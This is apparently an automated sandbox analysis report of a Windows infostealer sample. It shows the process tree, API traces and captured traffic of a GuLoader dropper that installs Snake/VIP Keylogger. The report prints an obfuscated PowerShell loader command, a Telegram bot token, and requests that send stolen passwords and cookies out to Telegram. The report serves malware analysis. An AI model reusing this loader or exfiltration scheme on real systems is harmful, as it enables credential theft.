2024-12-17 12:36:37 UTC	872	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 427766 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yhG8zip7sY99HF5IDgIhPQncFtPYjqLsJnkeek655qJd2h6icHtHCCsVC07r93l9KU6UqEOjffAsB0pNSrcb2Ojs6sl9Oh7sJEiy2x2MWE%2BkKFE5iIuFYaCv9YUEcEKxq5QPBYcJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36f5b64cce9e02-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2058&min_rtt=2058&rtt_var=772&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1416100&cwnd=244&unsent_bytes=0&cid=caf7943de51632d2&ts=459&x=0"
2024-12-17 12:36:37 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49915	172.67.177.134	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:40 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-17 12:36:40 UTC	880	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 12:36:40 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 427769 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jtikxHApgYUHXCF0nwpQNqwPyHfA%2B4cd7a0Q2XPUy3kIKjd1z6%2BOvD2T0Ew%2FWBjV7AiPdTnfnPcAHZ%2FEail8guL2KkGfb%2FXEQbbBATqn86XtiCSaOTdf9bNO1GC3GThuZvaKwbtw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f36f5c9bd8443b7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2092&min_rtt=2054&rtt_var=797&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1421616&cwnd=236&unsent_bytes=0&cid=da507797c4818732&ts=472&x=0"
2024-12-17 12:36:40 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49921	149.154.167.220	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:42 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:632922%0D%0ADate%20and%20Time:%2018/12/2024%20/%2013:54:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20632922%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-12-17 12:36:43 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 12:36:43 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 12:36:43 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49941	149.154.167.220	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:50 UTC	346	OUT	POST /bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendDocument?chat_id=6651300320&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd1ff686aa7ee1 Host: api.telegram.org Content-Length: 582
2024-12-17 12:36:50 UTC	582	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 66 66 36 38 36 61 61 37 65 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 36 33 32 39 32 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 37 2f 31 32 2f 32 30 32 34 20 2f 20 30 37 3a 33 36 3a 31 31 Data Ascii: --------------------------8dd1ff686aa7ee1Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:632922Date and Time: 17/12/2024 / 07:36:11
2024-12-17 12:36:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 12:36:50 GMT Content-Type: application/json Content-Length: 545 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 12:36:51 UTC	545	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 36 37 35 30 34 33 31 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 62 61 62 61 62 6b 61 6e 79 69 75 66 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 61 62 61 62 6b 61 6e 79 69 75 66 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 36 35 31 33 30 30 33 32 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 65 76 69 6c 6c 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 65 76 69 6c 6c 61 6c 6f 67 62 61 62 61 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 Data Ascii: {"ok":true,"result":{"message_id":116,"from":{"id":6675043108,"is_bot":true,"first_name":"bababkanyiuf","username":"bababkanyiufbot"},"chat":{"id":6651300320,"first_name":"Sevilla","last_name":"Log","username":"sevillalogbaba","type":"private"},"date":173

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49948	149.154.167.220	443	6220	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 12:36:54 UTC	376	OUT	POST /bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendDocument?chat_id=6651300320&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd2020b9ee5469 Host: api.telegram.org Content-Length: 1279 Connection: Keep-Alive
2024-12-17 12:36:54 UTC	1279	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 32 30 62 39 65 65 35 34 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 36 33 32 39 32 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 37 2f 31 32 2f 32 30 32 34 20 Data Ascii: --------------------------8dd2020b9ee5469Content-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies \| user \| VIP Recovery PC Name:632922Date and Time: 17/12/2024
2024-12-17 12:36:54 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Dec 2024 12:36:54 GMT Content-Type: application/json Content-Length: 557 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-17 12:36:54 UTC	557	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 36 37 35 30 34 33 31 30 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 62 61 62 61 62 6b 61 6e 79 69 75 66 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 61 62 61 62 6b 61 6e 79 69 75 66 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 36 35 31 33 30 30 33 32 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 65 76 69 6c 6c 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 6f 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 65 76 69 6c 6c 61 6c 6f 67 62 61 62 61 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 Data Ascii: {"ok":true,"result":{"message_id":117,"from":{"id":6675043108,"is_bot":true,"first_name":"bababkanyiuf","username":"bababkanyiufbot"},"chat":{"id":6651300320,"first_name":"Sevilla","last_name":"Log","username":"sevillalogbaba","type":"private"},"date":173

Target ID:	0
Start time:	07:34:57
Start date:	17/12/2024
Path:	C:\Users\user\Desktop\ugpJX5h56S.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ugpJX5h56S.exe"
Imagebase:	0x400000
File size:	920'112 bytes
MD5 hash:	D206D2D4CC4961ACE139AC7EB8C4F305
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:35:01
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle minimized "$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncranteric=$Chromoleucite.SubString(71126,3);.$Syncranteric($Chromoleucite)"
Imagebase:	0x3e0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2665491862.000000000A6E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:35:01
Start date:	17/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:35:55
Start date:	17/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xfc0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	22.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.9%
Total number of Nodes:	1376
Total number of Limit Nodes:	37

Executed Functions

Function 0040351C Relevance: 84.5, APIs: 32, Strings: 16, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040353F
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
OleInitialize.OLE32(00000000), ref: 0040365A
SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
CharNextW.USER32(00000000,"C:\Users\user\Desktop\ugpJX5h56S.exe",00000020,"C:\Users\user\Desktop\ugpJX5h56S.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036C7
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ugpJX5h56S.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E

Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E

wsprintfW.USER32 ref: 0040399B
GetFileAttributesW.KERNEL32(0042C800,C:\Users\user\AppData\Local\Temp\), ref: 004039CE
DeleteFileW.KERNEL32(0042C800), ref: 004039DA
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A08

Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B

CopyFileW.KERNEL32(00437800,0042C800,00000001,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403A1E

Part of subcall function 00405B24: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A

Part of subcall function 0040689E: FindFirstFileW.KERNELBASE(75923420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,75923420,?,C:\Users\user\AppData\Local\Temp\,00405C6D,?,75923420,C:\Users\user\AppData\Local\Temp\), ref: 004068A9
Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5

OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
ExitProcess.KERNEL32 ref: 00403A89
CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
ExitProcess.KERNEL32 ref: 00403B33

Part of subcall function 00405AEF: CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5

Strings

1033, xrefs: 00403860
NSIS Error, xrefs: 0040367F
SeShutdownPrivilege, xrefs: 00403AC2
UXTHEME, xrefs: 0040360A, 0040360F, 00403615
C:\Users\user\Desktop, xrefs: 0040395C
~nsu%X.tmp, xrefs: 00403992
\Temp, xrefs: 00403816
"$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncran, xrefs: 00403949
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis, xrefs: 004037E4, 00403906, 00403953, 00403961
TMP, xrefs: 0040384C
C:\Users\user\AppData\Local\Temp\, xrefs: 004037F4, 004037F9, 0040380F, 0040381B, 0040382A, 00403837, 00403843, 0040384B, 00403939, 004039BA, 004039E6, 00403A07, 00403A10
Error launching installer, xrefs: 004038E7
TEMP, xrefs: 00403844
C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet, xrefs: 00403911
"C:\Users\user\Desktop\ugpJX5h56S.exe", xrefs: 00403694, 0040369A, 004036AF, 0040388D
Low, xrefs: 00403832

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: "$Chromoleucite=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Ectomeric252.Cui';$Syncran$"C:\Users\user\Desktop\ugpJX5h56S.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis$C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Latin\Underfaldshjulet$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-2864783655
Opcode ID: fe98246c755eeab53da9b3688b78c9a4485cce5d238f6f2650d08d02ed1bb6d0
Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
Opcode Fuzzy Hash: fe98246c755eeab53da9b3688b78c9a4485cce5d238f6f2650d08d02ed1bb6d0
Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E

Function 00405705 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 00405763
GetDlgItem.USER32(?,000003EE), ref: 00405772
GetClientRect.USER32(?,?), ref: 004057AF
GetSystemMetrics.USER32(00000002), ref: 004057B6
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
ShowWindow.USER32(?,00000008), ref: 00405852
GetDlgItem.USER32(?,000003EC), ref: 00405873
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
GetDlgItem.USER32(?,000003F8), ref: 00405781

Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503

GetDlgItem.USER32(?,000003EC), ref: 004058C5
CreateThread.KERNELBASE(00000000,00000000,Function_00005699,00000000), ref: 004058D3
CloseHandle.KERNELBASE(00000000), ref: 004058DA
ShowWindow.USER32(00000000), ref: 004058FE
ShowWindow.USER32(?,00000008), ref: 00405903
ShowWindow.USER32(00000008), ref: 0040594D
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
CreatePopupMenu.USER32 ref: 00405992
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
GetWindowRect.USER32(?,?), ref: 004059C6
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
OpenClipboard.USER32(00000000), ref: 00405A27
EmptyClipboard.USER32 ref: 00405A2D
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
GlobalLock.KERNEL32(00000000), ref: 00405A43
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
GlobalUnlock.KERNEL32(00000000), ref: 00405A77
SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
CloseClipboard.USER32 ref: 00405A88

Strings

{, xrefs: 0040596B

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
